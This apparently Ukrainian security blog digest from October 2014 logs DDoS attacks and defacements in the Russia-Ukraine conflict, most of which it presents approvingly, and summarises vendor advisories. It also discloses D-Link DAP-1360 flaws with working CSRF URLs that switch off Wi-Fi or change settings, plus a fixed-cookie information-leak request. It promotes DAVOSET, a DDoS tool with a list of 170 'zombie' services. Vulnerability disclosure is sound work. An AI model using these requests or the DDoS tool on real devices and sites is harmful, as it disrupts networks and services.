Websecurity - Веб безпека

Раніше я писав про вересневі DDoS атаки та взломи в Україні, а зараз розповім про ситуацію у жовтні.

В зв’язку з сепаратистськими і терористичними акціями на сході України та парламентськими виборами в цьому місяці хакерська активність значно збільшилася. Відбулися наступні DDoS атаки та взломи в Інтернеті.

Проросійськими та іноземними хакерами були атаковані наступні сайти:

DDoS на tsn.ua (проросійськими хакерами) - 02.10.2014
DDoS на cvk.gov.ua (хакерами з КіберБеркуту) - 25.10.2014
yarema.info (хакерами з КіберБеркуту) - 25.10.2014
vyborkom.org (хакерами з КіберБеркуту) - 25.10.2014
mzm.zp.ua (хакерами з КіберБеркуту) - 25.10.2014

Іноземними хакерами були проведені неполітичні взломи:

Twitter акаунт “Зеркало недели” (невідомими хакерами) - 05.10.2014
snigiryevka-rada.gov.ua (хакером PaWL) - 05.10.2014
www.peremrda.gov.ua (хакером r3d_s0urc3) - 15.10.2014

Проукраїнськими хакерами були атаковані наступні сайти:

astroblduma.ru (невідомими хакерами) - 07.10.2014
www.cik-lnr.info (Українські Кібер Війська) - 30.10.2014
cikdnr.ru (українськими хакерами) - 31.10.2014
Жовтневі DDoS атаки на сайти ДНР і ЛНР

Сайти ДНР і ЛНР були атаковані неодноразово на протязі жовтня.

Українські Кібер Війська закрили наступні сайти:

Закритий сайт rus.in.ua (через скаргу хостеру) - 08.10.2014
Закритий сайт atv.odessa.ua (через скаргу хостеру) - 08.10.2014
Закритий сайт glagol.in.ua (через скаргу хостеру) - 08.10.2014
Закритий СБУ сайт cvk.com.ua (фішинг сайт ЦВК) - 25.10.2014

Виявлений витік інформації в IBM WebSphere Portal.

Уразливі версії: IBM WebSphere Portal 8.0.

Можна одержати відомості про конфігурацію.

• IBM Web Content Manager (WCM) XPath Injection (деталі)

24.05.2014

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router). Це Information Leakage та Cross-Site Request Forgery уразливості.

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

01.11.2014

Information Leakage (WASC-13):

Запит без авторизації http://192.168.0.50/index.cgi?v2=y&rq=4.

Cookie: cookie_lang=1; client_login=admin; client_password=1

Лише зі вказанням кукіса (з логіном, який є фіксованим, і довільним паролем) можна отримати достатньо інформації про пристрій (IP, MAC та інше). Це можна зробити при локальному доступі, через LAN і через Internet через XSS уразливість.

CSRF (WASC-09):

В розділі Wi-Fi - Common settings можна змінити параметри Enable Wireless, MBSSID, BSSID.

Вимкнути Wi-Fi:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}

Увімкнути Wi-Fi:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:true,%22mbssidNum%22:1,%22mbssidCur%22:1}

В розділі Wi-Fi - Basic settings можна змінити параметри Hide Access Point, SSID, Country, Channel, Wireless mode, Max Associated Clients.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}

Нова версія прошивки з виправленням даних уразливостей вийде в першій половині листопада.

У жовтні, 31.10.2014, вийшла нова версія програми DAVOSET v.1.2.2. В новій версії:

• Додав підтримку https адрес для цільових сайтів.
• Змінив налаштування по замовчуванню.
• Прибрав неробочі сервіси з повного списку зомбі.

Всього в списку міститься 170 зомбі-сервісів, які готові нанести удар проти диктатури.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality та XML External Entities уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

Скачати: DAVOSET_v.1.2.2.rar.

У жовтні місяці Microsoft випустила 9 патчів. Що значно більше ніж у вересні.

У жовтневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 9 бюлетенів по безпеці. Що закривають численні уразливості в програмних продуктах компанії. Один патч закриває критичну уразливість, сім патчів закривають важливі та один помірну уразливість.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT, 8.1 та RT 8.1. А також Microsoft Office, Internet Explorer, .NET Framework, ASP.NET MVC та SharePoint Server.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.dobrrda.gov.ua (хакером panataran) - 16.09.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.lbmadm.gov.ua (хакером Romantic) - 18.09.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.cvu.org.ua (невідомими хакерами) - 26.10.2014, зараз сайт вже виправлений адмінами
• http://klew.dp.ua (хакерами з novorossian Cyber Army)
• http://gslan.net.ua (хакером PaWL) - 05.10.2014, зараз сайт вже виправлений адмінами

В даній добірці експлоіти в веб додатках:

• DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities (деталі)
• ASProxy <= 5.5.0 Arbitrary File Download Vulnerability (деталі)
• Gitlist <= 0.4.0 - Remote Code Execution Exploit (деталі)
• Supermicro Onboard IPMI Port 49152 Sensitive File Exposure Exploit (деталі)
• MongoDB NoSQL Collection Enumeration Via Injection Exploit (деталі)

У вересні вже відбувалися DDoS атаки на сайти ДНР і ЛНР. Розповім про DDoS атаки на сайти цих терористичних організацій, що мали місце у жовтні.

Це DDoS атаки на різні сайти ДНР і ЛНР, які ГПУ визнала терористичними організаціями, а також на сайти, які підтримують їх. Що були проведені Українськими Кібер Військами.

DDoS на pravdatoday.info - 01-31.10.2014
DDoS на ungu.org - 01-31.10.2014
DDoS на bne.su - 01-31.10.2014
DDoS на molotpravdu.com - 01-31.10.2014
DDoS на odessa-antimaydan.com - 01-31.10.2014
DDoS на lvs-global.ru - 05-31.10.2014
DDoS на slemtt.myjino.ru - 05-31.10.2014
DDoS на helpnovorossia.ru - 05.10.2014
DDoS на без-вести.рф - 08-31.10.2014
DDoS на icp.su - 10.10.2014 і 12.10.2014
Та інші сайти ДНР і ЛНР.

Таким чином українські хакери висловили протест проти цих незаконних організацій на їх сайтах. Деякі з них тимчасово не працювали, а деякі сайти припинили роботу.

25.09.2014

Виявлена можливість виконання коду в bash.

Уразливі версії: bash 4.3.

Можна помістити функцію в зміст будь-якої змінної оточення.

Атака зокрема може проводитися через CGI скрипти, якщо вони написані на bash або відкривають шели. Такі шели використовуються функціями system/popen в C, open/system в Perl (якщо запускається шел, що залежить від командного рядка), os.system/os.popen в Python та system/exec в PHP (в режимі CGI).

• CVE-2014-6271: remote code execution through bash (деталі)
• Re: CVE-2014-6271: remote code execution through bash (деталі)
• Bash vulnerability (деталі)

30.10.2014

Додаткова інформація.

• HP StoreAll Operating System Software running Bash Shell, Remote Code Execution (деталі)
• Security Notice for Bash Shellshock Vulnerability (деталі)
• HP Remote Device Access: Virtual Customer Access System (vCAS) running Bash Shell, Remote Code Execution (деталі)
• VMware product updates address critical Bash security vulnerabilities (деталі)
• HP DreamColor Professional Display running Bash Shell, Remote Code Execution (деталі)
• the other bash RCEs (CVE-2014-6277 and CVE-2014-6278) (деталі)
• HP Thin Clients running Bash, Remote Execution of Code (деталі)

Сьогодні Українські Кібер Війська взломали сайт ЦВК Луганської Народної Республіки та відмінили так звані вибори в ЛНР і ДНР.

Після взлому сайта Міністерства Оборони РФ та взлому державного сервера РФ у серпні. Та інших взломів УКВ.

Хакери Українських Кібер Військ взломали веб сайт cik-lnr.info і повідомили на ньому про відміну виборів.